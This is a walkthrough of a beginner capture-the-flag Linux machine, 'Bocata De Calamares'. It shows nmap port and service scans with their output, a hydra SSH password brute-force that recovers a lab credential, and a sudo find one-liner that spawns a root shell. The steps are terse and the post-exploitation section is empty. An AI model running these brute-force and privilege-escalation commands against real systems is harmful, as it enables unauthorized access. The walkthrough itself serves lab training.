Bocata De Calamares

Operating system: Linux
Difficulty: Beginner
Release date: 11 January 2025
Creator: Condor & Curiosidades de Hackers

Initial enumeration

We run an nmap scan to discover which TCP ports are open on the target machine.

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 192.168.1.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-11 12:04 -03
Initiating ARP Ping Scan at 12:04
Scanning 192.168.1.16 [1 port]
Completed ARP Ping Scan at 12:04, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:04
Scanning 192.168.1.16 [65535 ports]
Discovered open port 22/tcp on 192.168.1.16
Discovered open port 80/tcp on 192.168.1.16
Completed SYN Stealth Scan at 12:04, 28.47s elapsed (65535 total ports)
Nmap scan report for 192.168.1.16
Host is up, received arp-response (0.00052s latency).
Scanned at 2025-01-11 12:04:18 -03 for 29s
Not shown: 52184 filtered tcp ports (no-response), 13349 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:CB:9C:C6 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 28.66 seconds
           Raw packets sent: 123961 (5.454MB) | Rcvd: 13353 (534.120KB)

We run nmap's basic enumeration scripts against the open ports to identify the service and version running on each of them.

nmap -sCV -p22,80 -oN servicesScan -vvv 192.168.1.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-11 12:05 -03
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
Initiating ARP Ping Scan at 12:05
Scanning 192.168.1.16 [1 port]
Completed ARP Ping Scan at 12:05, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:05
Scanning offensive.thl (192.168.1.16) [2 ports]
Discovered open port 80/tcp on 192.168.1.16
Discovered open port 22/tcp on 192.168.1.16
Completed SYN Stealth Scan at 12:05, 0.03s elapsed (2 total ports)
Initiating Service scan at 12:05
Scanning 2 services on offensive.thl (192.168.1.16)
Completed Service scan at 12:05, 6.04s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.16.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.12s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
Nmap scan report for offensive.thl (192.168.1.16)
Host is up, received arp-response (0.0025s latency).
Scanned at 2025-01-11 12:05:17 -03 for 6s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a6:3f:47:73:4c:6d:b3:23:29:fa:f8:1f:1d:42:44:b9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHyBvfo5SYGuNpOOumyFtmqq3W0DAUeq11YcE3QOqG5PR56zOIfdlE7/KL2JYKtG14FedZKpJWLS9sJaOHoGKFE=
|   256 11:b8:dc:df:a9:c1:9f:b5:8f:55:93:a4:ef:65:c8:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDJR2ahgUu1wLCXtWmCD0KmRU8y5VsaG0OSnc5kMuxr9
80/tcp open  http    syn-ack ttl 64 nginx 1.24.0 (Ubuntu)
|_http-title: AFN
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-favicon: Unknown favicon MD5: BF6231C430E40B86700ED83F2F2747B0
|_http-server-header: nginx/1.24.0 (Ubuntu)
MAC Address: 08:00:27:CB:9C:C6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:05
Completed NSE at 12:05, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.80 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Initial exploitation

echo 'lee_archivos' | base64
bGVlX2FyY2hpdm9zCg==

users.txt

tyuiop:superadministrator
hydra -L users.txt -P rockyou.txt ssh://192.168.1.16 -I -V
superadministrator:princesa

Privilege escalation

sudo find . -exec /bin/bash \; -quit

Post-exploitation
